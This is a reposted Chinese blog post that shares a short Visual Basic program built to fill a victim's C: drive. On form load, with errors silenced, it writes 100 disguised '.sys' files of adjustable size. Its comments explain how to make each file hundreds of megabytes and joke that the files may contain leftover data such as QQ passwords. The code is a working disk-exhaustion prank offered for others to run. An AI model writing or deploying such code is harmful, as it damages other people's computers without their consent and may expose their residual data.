ITPub博客

首页 > Linux操作系统 > Linux操作系统 > ★真正用VB产生随机任意大小文件挤满硬盘.(5行代码搞定,速度奇快) (转)

★真正用VB产生随机任意大小文件挤满硬盘.(5行代码搞定,速度奇快) (转)

原创 Linux操作系统 作者:WebSnap 时间:2019-05-30 12:57:08 0 删除 编辑
★真正用VB产生随机任意大小文件挤满硬盘.(5行代码搞定,速度奇快) (转)

Private Sub Form_Load()

On Error Resume Next

For h = 1 To 100   '(这个100为写入文件的个数,就是向C盘下写100个文件)

   Open "c:小黑侠" + CStr(h) + ".sys" For Random As 1
  '(在C盘下产生文件 类似 "小黑侠x.sys" x为数字)
DoEvents

Put #1, 30000, "小黑侠"

   '这里的这个30000是控制生成文件大小的。
   '30000产生的文件大小是3.6M左右
   '10000产生的文件大小是1.2M左右
   '如果你改为3000000的话,那就是360M,不要太坏哦!
   '如果你想知道那么大的文件里面是什么,那就就用写字板打开看就是了,可能里面还有你的qq密码也说不定。因为这些内容都是在你的缓存文件里随机产生的。不过你会在文件的最后一行看到有一个神秘的字符,那就是“小黑侠”字样。呵呵,我跑到你电脑里去玩了。

Close #1   '关闭打开的文件句柄
Next
End Sub

以是程序可以直接粘帖到VB工程文件中去即可执行
代码很简单,相信聪明的你一定看得懂。


在下小黑侠是也,欢迎各位来信交流
eMail:wl3000wl@163.com
Oicq:46393567

在下小站 ☆编程先锋☆ http://wlbookwl.myrice.com


★给你无限编程欲望,给你无限编程动力★


来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10797429/viewspace-101583/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论

注册时间:2008-01-04

  • 博文量
    136
  • 访问量
    100757